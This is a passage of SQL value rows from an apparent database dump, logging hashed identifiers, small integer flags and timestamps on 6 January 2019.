(46473, 'd5cfcbef00bbc26971f0a05e0905a044', 'd11c71184ec28f6f', 0, 2, 1, '2019-01-06 06:05:42'),
(46474, 'b71c07031e922cf290af6638dfbddc77', '71c8e334cfe84734', 0, 2, 1, '2019-01-06 06:06:22'),
(46475, 'b71c07031e922cf290af6638dfbddc77', '71c8e334cfe84734', 0, 2, 1, '2019-01-06 06:06:43'),
(46476, '9c61094a36e85122fffb7dfe6b98de7b', '65fb1a08fe2b5aab', 0, 2, 1, '2019-01-06 06:07:28'),
(46477, 'adb38ad7f27d7df750afabf98267e78c', 'dd0438c71cec594e', 0, 2, 1, '2019-01-06 06:08:03'),
(46478, 'b9a0714430f6cde9e0c053a5c91b5b50', '516da39d8168d0b6', 0, 2, 1, '2019-01-06 06:09:12'),
(46479, '5e336f502be38072f5515b1da0dfb304', 'b50d65df97c0251e', 0, 2, 1, '2019-01-06 06:11:28'),
(46480, 'afea148b7cfffcb12358c236c3000bc8', '6e117bd555667400', 0, 2, 1, '2019-01-06 06:12:00'),
(46481, 'a90fdb2a26b92ddc52723df628236f7d', 'f4310bcd3a0b59ad', 0, 2, 1, '2019-01-06 06:12:48'),
(46482, '7588238e51c0bcc7d5dbe9f601e74470', '503a514a8daa32a7', 0, 2, 1, '2019-01-06 06:13:05'),
(46483, '422c4f962eb3938a1f6fff1149d10038', 'e67416ef443a1169', 0, 2, 1, '2019-01-06 06:13:16'),
(46484, 'd7dc96b16b10b403a546762935adc884', '2fa458d0337a4355', 0, 2, 1, '2019-01-06 06:13:51'),
(46485, '9c61094a36e85122fffb7dfe6b98de7b', '65fb1a08fe2b5aab', 0, 2, 1, '2019-01-06 06:14:01'),
(46486, '7588238e51c0bcc7d5dbe9f601e74470', '503a514a8daa32a7', 0, 2, 1, '2019-01-06 06:14:15'),
(46487, 'd7dc96b16b10b403a546762935adc884', '2fa458d0337a4355', 0, 2, 1, '2019-01-06 06:14:35'),
(46488, 'afc8f33f6aa21e1be5ea9b1e0e21abc0', '3de88ff4581dab27', 0, 2, 1, '2019-01-06 06:14:47'),
(46489, 'b71c07031e922cf290af6638dfbddc77', '71c8e334cfe84734', 0, 2, 1, '2019-01-06 06:14:59'),
(46490, 'd5cfcbef00bbc26971f0a05e0905a044', 'd11c71184ec28f6f', 0, 2, 1, '2019-01-06 06:15:08'),
(46491, 'afc8f33f6aa21e1be5ea9b1e0e21abc0', '3de88ff4581dab27', 0, 2, 1, '2019-01-06 06:15:21'),
(46492, 'b71c07031e922cf290af6638dfbddc77', '71c8e334cfe84734', 0, 2, 1, '2019-01-06 06:15:23'),
(46493, 'afc8f33f6aa21e1be5ea9b1e0e21abc0', '3de88ff4581dab27', 0, 2, 1, '2019-01-06 06:15:25'),
(46494, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-06 06:15:33'),
(46495, 'b71c07031e922cf290af6638dfbddc77', '71c8e334cfe84734', 0, 2, 1, '2019-01-06 06:15:49'),
(46496, '0eb15977e157a8d4aa17b8ac02896310', '0ff5a19c0e7aad10', 0, 2, 1, '2019-01-06 06:15:56'),
(46497, 'b71c07031e922cf290af6638dfbddc77', '71c8e334cfe84734', 0, 2, 1, '2019-01-06 06:15:58'),
(46498, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-06 06:16:01'),
(46499, '9c61094a36e85122fffb7dfe6b98de7b', '65fb1a08fe2b5aab', 0, 2, 1, '2019-01-06 06:16:11'),
(46500, 'adb38ad7f27d7df750afabf98267e78c', 'dd0438c71cec594e', 0, 2, 1, '2019-01-06 06:16:16'),
(46501, '897b4511bb105d026d435cc9df8d0a46', 'fbf0576065758144', 0, 2, 1, '2019-01-06 06:16:20'),
(46502, 'd7dc96b16b10b403a546762935adc884', '2fa458d0337a4355', 0, 2, 1, '2019-01-06 06:16:28'),
(46503, '0eb15977e157a8d4aa17b8ac02896310', '0ff5a19c0e7aad10', 0, 2, 1, '2019-01-06 06:16:30'),
(46504, 'adb38ad7f27d7df750afabf98267e78c', 'dd0438c71cec594e', 0, 2, 1, '2019-01-06 06:16:59'),
(46505, 'd7dc96b16b10b403a546762935adc884', '2fa458d0337a4355', 0, 2, 1, '2019-01-06 06:17:06'),
(46506, '570fb6ba44c7fc758c2aaa2179d9d2de', 'b23e7d2d003864cf', 0, 2, 1, '2019-01-06 06:17:20'),
(46507, 'e730475277fee5ef844f292b0c64bc15', 'df5372a348c092d8', 0, 2, 1, '2019-01-06 06:17:23'),
(46508, 'ba5cc3868920dfac6cc7de951601ccd2', '411809a73756d39c', 0, 2, 1, '2019-01-06 06:17:28'),
(46509, 'f50867d366aff631924e1dc38f6f8a63', '71f85176cde554ff', 0, 2, 1, '2019-01-06 06:17:42'),
(46510, 'ba5cc3868920dfac6cc7de951601ccd2', '411809a73756d39c', 0, 2, 1, '2019-01-06 06:17:44'),
(46511, 'b71c07031e922cf290af6638dfbddc77', '71c8e334cfe84734', 0, 2, 1, '2019-01-06 06:17:47'),
(46512, '570fb6ba44c7fc758c2aaa2179d9d2de', 'b23e7d2d003864cf', 0, 2, 1, '2019-01-06 06:18:16'),
(46513, '570fb6ba44c7fc758c2aaa2179d9d2de', 'b23e7d2d003864cf', 0, 2, 1, '2019-01-06 06:18:29'),
(46514, 'd5cfcbef00bbc26971f0a05e0905a044', 'd11c71184ec28f6f', 0, 2, 1, '2019-01-06 06:18:45'),
(46515, '891e5e981844855cb4af5598150c17a2', '638f6b1ac3b915c3', 0, 2, 1, '2019-01-06 06:18:48'),
(46516, 'ba5cc3868920dfac6cc7de951601ccd2', '411809a73756d39c', 0, 2, 1, '2019-01-06 06:18:48'),
(46517, '9c61094a36e85122fffb7dfe6b98de7b', '65fb1a08fe2b5aab', 0, 2, 1, '2019-01-06 06:19:07'),
(46518, '5e336f502be38072f5515b1da0dfb304', 'b50d65df97c0251e', 0, 2, 1, '2019-01-06 06:20:07'),
(46519, 'b71c07031e922cf290af6638dfbddc77', '71c8e334cfe84734', 0, 2, 1, '2019-01-06 06:20:15'),
(46520, '83a236bccaf43a994f665a729c02614c', '12fc4b801e5257e8', 0, 2, 1, '2019-01-06 06:20:16'),
(46521, '0f77fc534011209acc96672c7387e273', '80d0e70110ede451', 0, 2, 1, '2019-01-06 06:20:26'),
(46522, '7588238e51c0bcc7d5dbe9f601e74470', '503a514a8daa32a7', 0, 2, 1, '2019-01-06 06:20:33'),
(46523, '386efdc69779821e2b81fa23b68b904f', '324d0c5c1f480926', 0, 2, 1, '2019-01-06 06:21:18'),
(46524, 'b71c07031e922cf290af6638dfbddc77', '71c8e334cfe84734', 0, 2, 1, '2019-01-06 06:21:20'),
(46525, '9c61094a36e85122fffb7dfe6b98de7b', '65fb1a08fe2b5aab', 0, 2, 1, '2019-01-06 06:21:21'),
(46526, 'b71c07031e922cf290af6638dfbddc77', '71c8e334cfe84734', 0, 2, 1, '2019-01-06 06:21:30'),
(46527, '0f77fc534011209acc96672c7387e273', '80d0e70110ede451', 0, 2, 1, '2019-01-06 06:22:13'),
(46528, '49be2d19a6158c7f2b3954e23c54c1da', '6c9329d63928183c', 0, 2, 1, '2019-01-06 06:22:19'),
(46529, '83a236bccaf43a994f665a729c02614c', '12fc4b801e5257e8', 0, 2, 1, '2019-01-06 06:22:21'),
(46530, '0f77fc534011209acc96672c7387e273', '80d0e70110ede451', 0, 2, 1, '2019-01-06 06:22:23'),
(46531, '83a236bccaf43a994f665a729c02614c', '12fc4b801e5257e8', 0, 2, 1, '2019-01-06 06:22:30'),
(46532, '83a236bccaf43a994f665a729c02614c', '12fc4b801e5257e8', 0, 2, 1, '2019-01-06 06:22:47'),
(46533, 'f50867d366aff631924e1dc38f6f8a63', '71f85176cde554ff', 0, 2, 1, '2019-01-06 06:23:01'),
(46534, 'e60a38c53df08a9fe3ca70ce35be77ab', 'b1b974139e0e43c6', 0, 2, 1, '2019-01-06 06:23:03'),
(46535, 'e60a38c53df08a9fe3ca70ce35be77ab', 'b1b974139e0e43c6', 0, 2, 1, '2019-01-06 06:23:04'),
(46536, '5e336f502be38072f5515b1da0dfb304', 'b50d65df97c0251e', 0, 2, 1, '2019-01-06 06:23:09'),
(46537, 'f50867d366aff631924e1dc38f6f8a63', '71f85176cde554ff', 0, 2, 1, '2019-01-06 06:23:28'),
(46538, 'e60a38c53df08a9fe3ca70ce35be77ab', 'b1b974139e0e43c6', 0, 2, 1, '2019-01-06 06:23:32'),
(46539, '7bb93c6f86102eb81b2b70268ae95125', 'b43949f3d3a73617', 0, 2, 1, '2019-01-06 06:23:52'),
(46540, 'adb38ad7f27d7df750afabf98267e78c', 'dd0438c71cec594e', 0, 2, 1, '2019-01-06 06:25:09'),
(46541, 'd5cfcbef00bbc26971f0a05e0905a044', 'd11c71184ec28f6f', 0, 2, 1, '2019-01-06 06:25:18'),
(46542, 'adb38ad7f27d7df750afabf98267e78c', 'dd0438c71cec594e', 0, 2, 1, '2019-01-06 06:25:22'),
(46543, '897b4511bb105d026d435cc9df8d0a46', 'fbf0576065758144', 0, 2, 1, '2019-01-06 06:25:26'),
(46544, 'e60a38c53df08a9fe3ca70ce35be77ab', 'b1b974139e0e43c6', 0, 2, 1, '2019-01-06 06:25:36'),
(46545, 'e60a38c53df08a9fe3ca70ce35be77ab', 'b1b974139e0e43c6', 0, 2, 1, '2019-01-06 06:26:00'),
(46546, '9c61094a36e85122fffb7dfe6b98de7b', '65fb1a08fe2b5aab', 0, 2, 1, '2019-01-06 06:26:32'),
(46547, 'e05db4875098232570a7c632b88fa46d', '0491af1ec626c086', 0, 2, 1, '2019-01-06 06:26:35'),
(46548, '5f69e3e418e15cf242594df2092978e6', '1c68b977b911188c', 0, 2, 1, '2019-01-06 06:28:09'),
(46549, 'e60a38c53df08a9fe3ca70ce35be77ab', 'b1b974139e0e43c6', 0, 2, 1, '2019-01-06 06:28:39'),
(46550, 'ab54f66b3a2521cc698699ef909bdb77', 'dace6e0c219330fc', 0, 2, 1, '2019-01-06 06:29:10'),
(46551, '32de276192491745f095d366d39fcce0', '93f30eaefda9d8c4', 0, 2, 1, '2019-01-06 06:29:19'),
(46552, '32de276192491745f095d366d39fcce0', '93f30eaefda9d8c4', 0, 2, 1, '2019-01-06 06:29:33'),
(46553, 'e60a38c53df08a9fe3ca70ce35be77ab', 'b1b974139e0e43c6', 0, 2, 1, '2019-01-06 06:31:01'),
(46554, '7588238e51c0bcc7d5dbe9f601e74470', '503a514a8daa32a7', 0, 2, 1, '2019-01-06 06:31:52'),
(46555, 'd5cfcbef00bbc26971f0a05e0905a044', 'd11c71184ec28f6f', 0, 2, 1, '2019-01-06 06:33:19'),
(46556, 'ab54f66b3a2521cc698699ef909bdb77', 'dace6e0c219330fc', 0, 2, 1, '2019-01-06 06:33:20'),
(46557, 'e60a38c53df08a9fe3ca70ce35be77ab', 'b1b974139e0e43c6', 0, 2, 1, '2019-01-06 06:33:29'),
(46558, '31274d4a0f33d42f23b5cb9db1769b71', 'b2bafb74467116e9', 0, 2, 1, '2019-01-06 06:33:45'),
(46559, 'adb38ad7f27d7df750afabf98267e78c', 'dd0438c71cec594e', 0, 2, 1, '2019-01-06 06:33:49'),
(46560, '9c61094a36e85122fffb7dfe6b98de7b', '65fb1a08fe2b5aab', 0, 2, 1, '2019-01-06 06:34:14'),
(46561, 'adb38ad7f27d7df750afabf98267e78c', 'dd0438c71cec594e', 0, 2, 1, '2019-01-06 06:34:24'),
(46562, 'adb38ad7f27d7df750afabf98267e78c', 'dd0438c71cec594e', 0, 2, 1, '2019-01-06 06:34:53'),
(46563, '570fb6ba44c7fc758c2aaa2179d9d2de', 'b23e7d2d003864cf', 0, 2, 1, '2019-01-06 06:35:56'),
(46564, '733faeefd2dceb92e4ab8f6d04bfc71c', '8cf1f4b8bd4cc593', 0, 2, 1, '2019-01-06 06:35:57'),
(46565, '009e468e7815bb986bd367e4e0cad7e8', '12638148327ca513', 0, 2, 1, '2019-01-06 06:36:03'),
(46566, '9c61094a36e85122fffb7dfe6b98de7b', '65fb1a08fe2b5aab', 0, 2, 1, '2019-01-06 06:36:12'),
(46567, 'd5cfcbef00bbc26971f0a05e0905a044', 'd11c71184ec28f6f', 0, 2, 1, '2019-01-06 06:36:36'),
(46568, '9c61094a36e85122fffb7dfe6b98de7b', '65fb1a08fe2b5aab', 0, 2, 1, '2019-01-06 06:36:45'),
(46569, '83a236bccaf43a994f665a729c02614c', '12fc4b801e5257e8', 0, 2, 1, '2019-01-06 06:36:50'),
(46570, 'e60a38c53df08a9fe3ca70ce35be77ab', 'b1b974139e0e43c6', 0, 2, 1, '2019-01-06 06:36:50'),
(46571, 'ab54f66b3a2521cc698699ef909bdb77', 'dace6e0c219330fc', 0, 2, 1, '2019-01-06 06:37:04'),
(46572, 'd5cfcbef00bbc26971f0a05e0905a044', 'd11c71184ec28f6f', 0, 2, 1, '2019-01-06 06:37:09'),
(46573, 'b272de3acf0e7abaf04f11bc934d0898', 'e3413f2163c4f64a', 0, 2, 1, '2019-01-06 06:37:29'),
(46574, 'ab54f66b3a2521cc698699ef909bdb77', 'dace6e0c219330fc', 0, 2, 1, '2019-01-06 06:37:42'),
(46575, '94c9d8a4dad122b9dd344b89c694ac1c', '27d3b62cdd82d36e', 0, 2, 1, '2019-01-06 06:37:46'),
(46576, '7588238e51c0bcc7d5dbe9f601e74470', '503a514a8daa32a7', 0, 2, 1, '2019-01-06 06:38:00'),
(46577, 'e60a38c53df08a9fe3ca70ce35be77ab', 'b1b974139e0e43c6', 0, 2, 1, '2019-01-06 06:38:23'),
(46578, 'e60a38c53df08a9fe3ca70ce35be77ab', 'b1b974139e0e43c6', 0, 2, 1, '2019-01-06 06:38:27'),
(46579, '8ea2264d589a322478fae203306e2888', '0bf16c319bd2f666', 0, 2, 1, '2019-01-06 06:38:52'),
(46580, 'e60a38c53df08a9fe3ca70ce35be77ab', 'b1b974139e0e43c6', 0, 2, 1, '2019-01-06 06:39:16'),
(46581, 'a547eea91ee0db9055003753989fa358', 'df27b9a2919a8206', 0, 2, 1, '2019-01-06 06:39:17'),
(46582, 'f4c2dc4cf3f30cae2569fd753aeb1208', '3e6a18344d8b3fc3', 0, 2, 1, '2019-01-06 06:41:13'),
(46583, '897b4511bb105d026d435cc9df8d0a46', 'fbf0576065758144', 0, 2, 1, '2019-01-06 06:41:26'),
(46584, '105965090c5c4385c843254472e35533', '8cf1f4b8bd4cc593', 0, 2, 1, '2019-01-06 06:41:37'),
(46585, '2affface1c5bcf5a04e4d3f94965999b', 'b11b89b4cb1d077c', 0, 2, 1, '2019-01-06 06:41:42'),
(46586, '32de276192491745f095d366d39fcce0', '93f30eaefda9d8c4', 0, 2, 1, '2019-01-06 06:42:04'),
(46587, 'bc8c341542c8f0860e7c12c67b27632e', 'c454d725c5518f16', 0, 2, 1, '2019-01-06 06:42:32'),
(46588, '4fe9690a32384886c078fdfba6bd49c5', 'c7d4ce8b0de12339', 0, 2, 1, '2019-01-06 06:42:33'),
(46589, 'adb38ad7f27d7df750afabf98267e78c', 'dd0438c71cec594e', 0, 2, 1, '2019-01-06 06:43:06'),
(46590, 'bfec52694055b652fa099f963471a0b0', '960d12b6c14f65ca', 0, 2, 1, '2019-01-06 06:43:08'),
(46591, '09ee2b0e9b02528ce614f7d46d21d2a7', 'f19010d8a5f137d0', 0, 2, 1, '2019-01-06 06:43:09'),
(46592, '897b4511bb105d026d435cc9df8d0a46', 'fbf0576065758144', 0, 2, 1, '2019-01-06 06:44:49'),
(46593, '83a236bccaf43a994f665a729c02614c', '12fc4b801e5257e8', 0, 2, 1, '2019-01-06 06:44:54'),
(46594, '4fe9690a32384886c078fdfba6bd49c5', 'c7d4ce8b0de12339', 0, 2, 1, '2019-01-06 06:45:18'),
(46595, '83a236bccaf43a994f665a729c02614c', '12fc4b801e5257e8', 0, 2, 1, '2019-01-06 06:45:33'),
(46596, '1df9226f74d3c27c2fc5f5b28b176bdd', '32b169e936bbe5df', 0, 2, 1, '2019-01-06 06:45:42'),
(46597, '436e7aff915ba029d7c1e8af6e6c0e2d', '0e323506d51b8213', 0, 2, 1, '2019-01-06 06:46:12'),
(46598, 'e730475277fee5ef844f292b0c64bc15', 'df5372a348c092d8', 0, 2, 1, '2019-01-06 06:46:19'),
(46599, 'd21acb4072f069aa4066cbc2869c29a8', 'b2e78912dacced42', 0, 2, 1, '2019-01-06 06:47:35'),
(46600, 'bfdfa66ce220e85a64228db9c2b21628', '46713cac27a94b83', 0, 2, 1, '2019-01-06 06:48:25'),
(46601, 'bfdfa66ce220e85a64228db9c2b21628', '46713cac27a94b83', 0, 2, 1, '2019-01-06 06:48:33'),
(46602, 'adb38ad7f27d7df750afabf98267e78c', 'dd0438c71cec594e', 0, 2, 1, '2019-01-06 06:48:45'),
(46603, 'afea148b7cfffcb12358c236c3000bc8', '6e117bd555667400', 0, 2, 1, '2019-01-06 06:49:26'),
(46604, '6db281480421d11fd45254094a7e1549', '23668c072584bc84', 0, 2, 1, '2019-01-06 06:49:32'),
(46605, '153042ba29492973e282914b753db4a0', '8e815b2f4d02fe94', 0, 2, 1, '2019-01-06 06:49:59'),
(46606, 'a547eea91ee0db9055003753989fa358', 'df27b9a2919a8206', 0, 2, 1, '2019-01-06 06:50:05'),
(46607, 'ab14aaaf73c622da1f62e64530de76b5', '461b6ce2b519cdc8', 0, 2, 1, '2019-01-06 06:50:15'),
(46608, '83a236bccaf43a994f665a729c02614c', '12fc4b801e5257e8', 0, 2, 1, '2019-01-06 06:50:32'),
(46609, 'ee9158c41269da76cd50bb062aa6c6fd', '7ec969d351bcf68e', 0, 2, 1, '2019-01-06 06:50:39'),
(46610, 'a90fdb2a26b92ddc52723df628236f7d', 'f4310bcd3a0b59ad', 0, 2, 1, '2019-01-06 06:50:58'),
(46611, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-06 06:53:38'),
(46612, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-06 06:55:03'),
(46613, '845b1ee85593e4b32a2fa366b67297ef', '9e0d2d6ec4e6ebaa', 0, 2, 1, '2019-01-06 06:56:17'),
(46614, '82b1464ef8f953a1a0402a3c4471aee4', '9a903552e28cf43c', 0, 2, 1, '2019-01-06 06:57:08'),
(46615, 'afc8f33f6aa21e1be5ea9b1e0e21abc0', '3de88ff4581dab27', 0, 2, 1, '2019-01-06 06:57:24'),
(46616, '4404e9ee1a7ae2ea0cb64b3fcca52025', 'de580675a5823c8e', 0, 2, 1, '2019-01-06 06:58:07'),
(46617, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-06 06:58:08'),
(46618, 'a90fdb2a26b92ddc52723df628236f7d', 'f4310bcd3a0b59ad', 0, 2, 1, '2019-01-06 06:58:44'),
(46619, 'adb38ad7f27d7df750afabf98267e78c', 'dd0438c71cec594e', 0, 2, 1, '2019-01-06 06:59:40'),
(46620, 'f50867d366aff631924e1dc38f6f8a63', '71f85176cde554ff', 0, 2, 1, '2019-01-06 06:59:43'),
(46621, 'f05ab0962cb2fce9d3f686950ba626e4', 'ffa27255a9f34a6f', 0, 2, 1, '2019-01-06 07:00:07'),
(46622, 'f05ab0962cb2fce9d3f686950ba626e4', 'ffa27255a9f34a6f', 0, 2, 1, '2019-01-06 07:00:26'),
(46623, 'adb38ad7f27d7df750afabf98267e78c', 'dd0438c71cec594e', 0, 2, 1, '2019-01-06 07:00:41'),
(46624, '5f69e3e418e15cf242594df2092978e6', '1c68b977b911188c', 0, 2, 1, '2019-01-06 07:01:44'),
(46625, 'adb38ad7f27d7df750afabf98267e78c', 'dd0438c71cec594e', 0, 2, 1, '2019-01-06 07:02:04'),
(46626, 'adb38ad7f27d7df750afabf98267e78c', 'dd0438c71cec594e', 0, 2, 1, '2019-01-06 07:02:20'),
(46627, 'adb38ad7f27d7df750afabf98267e78c', 'dd0438c71cec594e', 0, 2, 1, '2019-01-06 07:02:34'),
(46628, 'ee7887ae07094f25f0b87c566dbe8da2', 'ccfcc9b57e7b5041', 0, 2, 1, '2019-01-06 07:02:53'),
(46629, '2ed495bf1bca17a14a102d7276e2b1df', 'b53c70bea01d2d6e', 0, 2, 1, '2019-01-06 07:02:58'),
(46630, 'adb38ad7f27d7df750afabf98267e78c', 'dd0438c71cec594e', 0, 2, 1, '2019-01-06 07:03:34'),
(46631, 'e60a38c53df08a9fe3ca70ce35be77ab', 'b1b974139e0e43c6', 0, 2, 1, '2019-01-06 07:03:55'),
(46632, '8b09f88bd51be333ccd31c5db4fe7909', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-01-06 07:06:18'),
(46633, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-06 07:06:43'),
(46634, 'b1eb5f4f1d42afb8728b42a4ce3f63a6', '7501b42c35accff7', 0, 2, 1, '2019-01-06 07:08:18'),
(46635, '7bb93c6f86102eb81b2b70268ae95125', 'b43949f3d3a73617', 0, 2, 1, '2019-01-06 07:09:49'),
(46636, '7522b91d8f5911205b0d5f86866d2536', '4c07673592205f17', 0, 2, 1, '2019-01-06 07:10:04'),
(46637, '8b09f88bd51be333ccd31c5db4fe7909', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-01-06 07:10:39'),
(46638, 'c86387f24dc70c4e2b48110e813c7b10', '7030f2d754282ace', 0, 2, 1, '2019-01-06 07:10:48'),
(46639, 'bf89e6d9f8d1770fa037618c0aa7ca2e', '74aba437eea39f30', 0, 2, 1, '2019-01-06 07:11:09'),
(46640, 'c86387f24dc70c4e2b48110e813c7b10', '7030f2d754282ace', 0, 2, 1, '2019-01-06 07:11:23'),
(46641, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-06 07:11:23'),
(46642, 'f50867d366aff631924e1dc38f6f8a63', '71f85176cde554ff', 0, 2, 1, '2019-01-06 07:11:36'),
(46643, 'adb38ad7f27d7df750afabf98267e78c', 'dd0438c71cec594e', 0, 2, 1, '2019-01-06 07:11:40'),
(46644, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-06 07:11:45'),
(46645, 'eef3dbdbb74aa46cce0fdee8dae8ec37', '83bb13387505b354', 0, 2, 1, '2019-01-06 07:12:15'),
(46646, 'eef3dbdbb74aa46cce0fdee8dae8ec37', '83bb13387505b354', 0, 2, 1, '2019-01-06 07:12:45'),
(46647, '744e71e8ad60d8315d7fd8d092fd729e', 'a5736c988cfb53ac', 0, 2, 1, '2019-01-06 07:12:54'),
(46648, 'afc8f33f6aa21e1be5ea9b1e0e21abc0', '3de88ff4581dab27', 0, 2, 1, '2019-01-06 07:13:00'),
(46649, '1785237bc7f511cdc35a898425da6ee1', 'c1e9007c175ad288', 0, 2, 1, '2019-01-06 07:13:01'),
(46650, 'eef3dbdbb74aa46cce0fdee8dae8ec37', '83bb13387505b354', 0, 2, 1, '2019-01-06 07:13:05'),
(46651, '744e71e8ad60d8315d7fd8d092fd729e', 'a5736c988cfb53ac', 0, 2, 1, '2019-01-06 07:13:15'),
(46652, '845b1ee85593e4b32a2fa366b67297ef', '9e0d2d6ec4e6ebaa', 0, 2, 1, '2019-01-06 07:13:23'),
(46653, '22f07523b0926aea874dff1db16c1479', '814e14b432590743', 0, 2, 1, '2019-01-06 07:13:50'),
(46654, 'bb83ad2c1948a38ca5f744642b7876a6', '0530018377078939', 0, 2, 1, '2019-01-06 07:13:55'),
(46655, 'bb83ad2c1948a38ca5f744642b7876a6', '0530018377078939', 0, 2, 1, '2019-01-06 07:14:03'),
(46656, 'bb83ad2c1948a38ca5f744642b7876a6', '0530018377078939', 0, 2, 1, '2019-01-06 07:14:10'),
(46657, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-06 07:14:18'),
(46658, '22f07523b0926aea874dff1db16c1479', '814e14b432590743', 0, 2, 1, '2019-01-06 07:14:19'),
(46659, 'bb83ad2c1948a38ca5f744642b7876a6', '0530018377078939', 0, 2, 1, '2019-01-06 07:14:49'),
(46660, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-06 07:16:03'),
(46661, 'bb83ad2c1948a38ca5f744642b7876a6', '0530018377078939', 0, 2, 1, '2019-01-06 07:16:15'),
(46662, 'adb38ad7f27d7df750afabf98267e78c', 'dd0438c71cec594e', 0, 2, 1, '2019-01-06 07:17:01'),
(46663, '8ea2264d589a322478fae203306e2888', '0bf16c319bd2f666', 0, 2, 1, '2019-01-06 07:18:33'),
(46664, '2fa4c289fd449ce3ed8f5df492fafed6', '70df5ba7bd3f1512', 0, 2, 1, '2019-01-06 07:18:42'),
(46665, '2fa4c289fd449ce3ed8f5df492fafed6', '70df5ba7bd3f1512', 0, 2, 1, '2019-01-06 07:18:56'),
(46666, '100fe12a033f311099d402004c1d941f', 'cdcd449d36198205', 0, 2, 1, '2019-01-06 07:19:09'),
(46667, '4b6fe4db3564312bf37e6afc0f0623d6', 'a65bc13916745d8b', 0, 2, 1, '2019-01-06 07:19:23'),
(46668, '4b6fe4db3564312bf37e6afc0f0623d6', 'a65bc13916745d8b', 0, 2, 1, '2019-01-06 07:19:51'),
(46669, '062a0a92fb7f693f0712a73db9ebcfc4', '91d21119de46096c', 0, 2, 1, '2019-01-06 07:20:17'),
(46670, 'eef3dbdbb74aa46cce0fdee8dae8ec37', '83bb13387505b354', 0, 2, 1, '2019-01-06 07:20:23'),
(46671, 'adb38ad7f27d7df750afabf98267e78c', 'dd0438c71cec594e', 0, 2, 1, '2019-01-06 07:20:32'),
(46672, '062a0a92fb7f693f0712a73db9ebcfc4', '91d21119de46096c', 0, 2, 1, '2019-01-06 07:20:35'),
(46673, '5e8d8e96963a09aab7ada40bc76ffff2', 'f556605047b35dd8', 0, 2, 1, '2019-01-06 07:20:51'),
(46674, '897b4511bb105d026d435cc9df8d0a46', 'fbf0576065758144', 0, 2, 1, '2019-01-06 07:22:03'),
(46675, '7bb93c6f86102eb81b2b70268ae95125', 'b43949f3d3a73617', 0, 2, 1, '2019-01-06 07:22:12'),
(46676, 'eef3dbdbb74aa46cce0fdee8dae8ec37', '83bb13387505b354', 0, 2, 1, '2019-01-06 07:22:41'),
(46677, 'eef3dbdbb74aa46cce0fdee8dae8ec37', '83bb13387505b354', 0, 2, 1, '2019-01-06 07:22:57'),
(46678, 'afc8f33f6aa21e1be5ea9b1e0e21abc0', '3de88ff4581dab27', 0, 2, 1, '2019-01-06 07:23:55'),
(46679, 'afc8f33f6aa21e1be5ea9b1e0e21abc0', '3de88ff4581dab27', 0, 2, 1, '2019-01-06 07:25:10'),
(46680, '386efdc69779821e2b81fa23b68b904f', '324d0c5c1f480926', 0, 2, 1, '2019-01-06 07:25:24'),
(46681, 'eef3dbdbb74aa46cce0fdee8dae8ec37', '83bb13387505b354', 0, 2, 1, '2019-01-06 07:25:56'),
(46682, 'afc8f33f6aa21e1be5ea9b1e0e21abc0', '3de88ff4581dab27', 0, 2, 1, '2019-01-06 07:25:56'),
(46683, 'bfec52694055b652fa099f963471a0b0', '960d12b6c14f65ca', 0, 2, 1, '2019-01-06 07:25:56'),
(46684, 'd199bde5cbc1b564cf07908380ab3283', '0b1466b4de9b8a16', 0, 2, 1, '2019-01-06 07:26:03'),
(46685, '63313c27597e3a7d1e0aacd5738b96dc', 'b7f732384cb533aa', 0, 2, 1, '2019-01-06 07:26:05'),
(46686, 'afc8f33f6aa21e1be5ea9b1e0e21abc0', '3de88ff4581dab27', 0, 2, 1, '2019-01-06 07:26:12'),
(46687, 'cda73818c15effbd8d6ea1139813262c', '679c2311f97bf8cf', 0, 2, 1, '2019-01-06 07:26:15'),
(46688, '746e5a5decd9ec265e29b7e14635f0d8', '9e54679b144bbbf5', 0, 2, 1, '2019-01-06 07:26:41'),
(46689, 'eef3dbdbb74aa46cce0fdee8dae8ec37', '83bb13387505b354', 0, 2, 1, '2019-01-06 07:26:51'),
(46690, 'eef3dbdbb74aa46cce0fdee8dae8ec37', '83bb13387505b354', 0, 2, 1, '2019-01-06 07:27:03'),
(46691, '31274d4a0f33d42f23b5cb9db1769b71', 'b2bafb74467116e9', 0, 2, 1, '2019-01-06 07:27:12'),
(46692, 'afea148b7cfffcb12358c236c3000bc8', '6e117bd555667400', 0, 2, 1, '2019-01-06 07:27:16'),
(46693, '746e5a5decd9ec265e29b7e14635f0d8', '9e54679b144bbbf5', 0, 2, 1, '2019-01-06 07:27:19'),
(46694, 'eef3dbdbb74aa46cce0fdee8dae8ec37', '83bb13387505b354', 0, 2, 1, '2019-01-06 07:27:25'),
(46695, '746e5a5decd9ec265e29b7e14635f0d8', '9e54679b144bbbf5', 0, 2, 1, '2019-01-06 07:27:30'),
(46696, '746e5a5decd9ec265e29b7e14635f0d8', '9e54679b144bbbf5', 0, 2, 1, '2019-01-06 07:27:59'),
(46697, 'eef3dbdbb74aa46cce0fdee8dae8ec37', '83bb13387505b354', 0, 2, 1, '2019-01-06 07:27:59'),
(46698, 'adb38ad7f27d7df750afabf98267e78c', 'dd0438c71cec594e', 0, 2, 1, '2019-01-06 07:28:15'),
(46699, '32de276192491745f095d366d39fcce0', '93f30eaefda9d8c4', 0, 2, 1, '2019-01-06 07:28:32'),
(46700, 'adb38ad7f27d7df750afabf98267e78c', 'dd0438c71cec594e', 0, 2, 1, '2019-01-06 07:28:43'),
(46701, '746e5a5decd9ec265e29b7e14635f0d8', '9e54679b144bbbf5', 0, 2, 1, '2019-01-06 07:28:47'),
